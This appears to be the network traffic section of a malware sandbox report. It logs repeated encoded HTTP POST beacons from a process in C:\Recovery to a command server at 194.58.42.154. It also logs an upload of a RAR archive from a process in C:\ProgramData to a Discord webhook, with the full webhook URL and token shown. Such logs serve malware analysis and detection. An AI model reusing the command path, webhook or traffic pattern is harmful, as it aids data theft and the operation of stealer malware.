Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:52.336977005 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:52.690565109 CEST	2512	OUT	Data Raw: 58 53 59 56 5a 47 57 59 5e 5a 5a 56 50 5a 50 58 55 56 5c 5e 54 5d 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XSYVZGWY^ZZVPZPXUV\^T]Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%_(-4?$>#&(?1Q#(/?;%=& - T<:*4Q#'-9^/.]+3
Aug 1, 2024 04:28:53.138564110 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:53.269494057 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49777	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:53.496398926 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2504 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:53.846669912 CEST	2504	OUT	Data Raw: 58 51 59 52 5a 47 57 5b 5e 5a 5a 56 50 5e 50 5d 55 52 5c 5d 54 5c 5a 5f 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XQYRZGW[^ZZVP^P]UR\]T\Z_YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%+ :#;>:=/-!+'\(/'. <U(: 7^39^/.]+3
Aug 1, 2024 04:28:54.306552887 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:54.443778038 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49778	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:54.721050978 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:55.065433979 CEST	2512	OUT	Data Raw: 58 50 5c 56 5a 40 57 5e 5e 5a 5a 56 50 58 50 5a 55 56 5c 58 54 5d 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XP\VZ@W^^ZZVPXPZUV\XT]Z\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%(U974#_=!V"(3Y<?^%=" .0V<677'=9^/.]+;
Aug 1, 2024 04:28:55.505470991 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:55.685601950 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49780	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:57.296452999 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1996 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:57.643682957 CEST	1996	OUT	Data Raw: 58 55 5c 56 5f 45 52 58 5e 5a 5a 56 50 57 50 58 55 57 5c 5b 54 5a 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XU\V_ERX^ZZVPWPXUW\[TZZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%< %4<]>3_>?)W#;?\+;+X'& .8U?-#;'=9^/.]+
Aug 1, 2024 04:28:58.092801094 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:58.227440119 CEST	380	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:57 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 1e 21 18 22 02 20 3d 2f 0e 39 39 25 05 28 0d 35 03 29 02 02 58 24 0d 2b 10 29 3e 3b 00 2a 2c 20 11 31 3d 2c 55 37 2c 25 56 28 26 2a 46 0c 10 25 5a 28 13 20 0d 32 3f 34 09 3a 33 3e 1e 25 10 11 5b 23 3c 32 16 37 15 38 14 2b 28 33 09 24 29 02 1b 3a 00 0c 15 31 0e 3d 02 34 0f 2a 54 02 15 24 0e 2a 2d 07 12 24 21 38 15 25 02 15 56 26 00 03 10 36 5a 25 13 23 00 2e 16 33 28 01 50 28 3e 2b 09 25 11 27 02 3f 31 00 0b 22 2d 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &!" =/99%(5)X$+)>;, 1=,U7,%V(&F%Z( 2?4:3>%[#<278+(3$):1=4T$-$!8%V&6Z%#.3(P(>+%'?1"- P*,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49781	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:57.426158905 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:57.784280062 CEST	2512	OUT	Data Raw: 58 55 5c 53 5a 41 57 5b 5e 5a 5a 56 50 58 50 5b 55 51 5c 5f 54 5d 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XU\SZAW[^ZZVPXP[UQ\_T]ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(4/'>#:*<5!/Y?'[3>)U#=;+)9^#4]09^/.]+;
Aug 1, 2024 04:28:58.225663900 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:58.364523888 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49782	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:58.492227077 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:28:58.846752882 CEST	2512	OUT	Data Raw: 5d 51 5c 56 5f 40 57 5f 5e 5a 5a 56 50 59 50 5d 55 56 5c 5f 54 5a 5a 5e 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]Q\V_@W_^ZZVPYP]UV\_TZZ^YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%<%S7 > =(,Q6+'+ 3=78+[#7]'-9^/.]+
Aug 1, 2024 04:28:59.289421082 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:59.423705101 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49783	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:29:00.088128090 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:29:00.440613031 CEST	2512	OUT	Data Raw: 58 5e 5c 56 5f 44 57 5e 5e 5a 5a 56 50 5b 50 5b 55 51 5c 51 54 5f 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X^\V_DW^^ZZVP[P[UQ\QT_ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&<&4,<_=\?!,<X0-T4><))="'8]39^/.]+7
Aug 1, 2024 04:29:00.898355961 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:29:01.241123915 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:29:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z
Aug 1, 2024 04:29:01.241213083 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:29:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49784	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:29:01.528892040 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:29:01.878110886 CEST	2512	OUT	Data Raw: 58 51 5c 52 5f 4b 57 53 5e 5a 5a 56 50 58 50 5b 55 57 5c 5d 54 59 5a 5e 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XQ\R_KWS^ZZVPXP[UW\]TYZ^YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X(#9T <=*)P"+;Y++$$.& X'(5Z4'3=9^/.]+;
Aug 1, 2024 04:29:02.326628923 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:29:02.455996037 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:29:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49785	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:29:03.908575058 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1996 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:29:04.252912998 CEST	1996	OUT	Data Raw: 58 5e 59 55 5f 40 57 5d 5e 5a 5a 56 50 5d 50 5f 55 51 5c 59 54 59 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X^YU_@W]^ZZVP]P_UQ\YTYZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%_+>!/+0-)"$</'=- . <#'8]39^/.]+/
Aug 1, 2024 04:29:04.701478004 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:29:04.831768990 CEST	380	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:29:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 1e 35 25 2d 13 34 07 2c 55 39 04 31 05 2b 55 39 00 28 3c 20 59 27 0d 28 0d 3c 03 38 5b 3f 3f 27 04 25 3d 34 57 23 3c 03 50 3f 36 2a 46 0c 10 26 07 3f 5b 20 09 31 01 0e 0d 39 09 3d 46 31 10 1e 03 35 11 36 1b 34 02 33 07 3f 3b 23 09 24 29 27 0b 2e 10 3d 01 31 37 00 58 34 35 2a 54 02 15 24 0f 3e 2d 0b 59 30 0c 19 07 25 3c 3c 0d 24 2e 2a 01 36 12 29 5b 20 07 0b 06 30 5e 20 0a 3f 00 01 08 31 06 3b 01 3e 21 3d 15 35 17 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &5%-4,U91+U9(< Y'(<8[??'%=4W#<P?6F&?[ 19=F15643?;#$)'.=17X45T$>-Y0%<<$.6)[ 0^ ?1;>!=5 P,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49786	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:29:03.942960978 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:29:04.300242901 CEST	2512	OUT	Data Raw: 5d 52 5c 57 5a 41 57 5b 5e 5a 5a 56 50 5f 50 5a 55 56 5c 51 54 5e 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]R\WZAW[^ZZVP_PZUV\QT^Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%< %S#X=3!=<#++( 3=-#=<+**44809^/.]+'
Aug 1, 2024 04:29:04.723057032 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:29:04.850946903 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:29:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49787	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:29:04.974018097 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:29:05.331149101 CEST	2512	OUT	Data Raw: 5d 51 5c 56 5f 43 52 5d 5e 5a 5a 56 50 56 50 50 55 54 5c 51 54 5e 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]Q\V_CR]^ZZVPVPPUT\QT^ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%)37<Y= "^)<Q"8/+;Y0=97.?<:_ 7$9^/.]+
Aug 1, 2024 04:29:05.793731928 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:29:05.977181911 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:29:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49788	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:29:06.190058947 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:29:06.978975058 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:29:16.986957073 CEST	166	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:29:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
Aug 1, 2024 04:29:23.456589937 CEST	2512	OUT	Data Raw: 58 55 5c 57 5f 44 57 58 5e 5a 5a 56 50 5b 50 51 55 55 5c 5f 54 5a 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XU\W_DWX^ZZVP[PQUU\_TZZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?-!?'= &^=<!5('^0% >(*!_#7&-9^/.]+7

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49747	162.159.136.232	443	6828	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-01 02:28:08 UTC	302	OUT	POST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 761014 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=ae617a8a1c033a753623c0f68de035b0
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: 2d 2d 61 65 36 31 37 61 38 61 31 63 30 33 33 61 37 35 33 36 32 33 63 30 66 36 38 64 65 30 33 35 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 a9 1d ba 09 21 04 00 00 01 0f e2 71 38 3a bd e9 e2 94 0c 58 bd d8 68 08 3f 4c 28 e3 13 6a 65 83 dc 53 13 a9 35 40 28 62 92 8d d1 e9 06 21 68 73 bc 3b 3c 5d f0 f5 98 2c 57 07 f8 4d 77 e6 6f a1 0b 02 e9 94 07 91 60 6f 3a b2 31 8b 31 7d e7 10 b5 dc a8 85 0f 7c 17 0a a4 95 7b Data Ascii: 